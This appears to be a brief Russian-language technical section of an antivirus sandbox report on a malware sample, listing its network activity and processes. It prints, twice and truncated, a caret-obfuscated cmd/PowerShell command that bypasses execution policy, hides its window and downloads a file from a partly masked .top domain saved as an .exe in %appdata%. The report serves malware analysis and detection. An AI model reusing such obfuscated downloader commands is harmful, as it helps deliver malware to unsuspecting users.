Техническая информация
- http://re#####nikersbounty.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^OwERS^HE^L^l.eXE -^exECU^tio^n^P^olIC^y BYp^aSs^ -noPROFI^Le ^-W^IN^d^OW^s^tYL^e ^Hid^DEn (NE^w^-obj^ect^ ^sYS^Tem^.NET^.WEbc^Li^eN^t).^D^o^wNl^OAdFil^e('http://re#####nikers...
- DNS ASK re#####nikersbounty.top
- '<SYSTEM32>\cmd.exe' /C "p^OwERS^HE^L^l.eXE -^exECU^tio^n^P^olIC^y BYp^aSs^ -noPROFI^Le ^-W^IN^d^OW^s^tYL^e ^Hid^DEn (NE^w^-obj^ect^ ^sYS^Tem^.NET^.WEbc^Li^eN^t).^D^o^wNl^OAdFil^e('http://re#####nikers...' (со скрытым окном)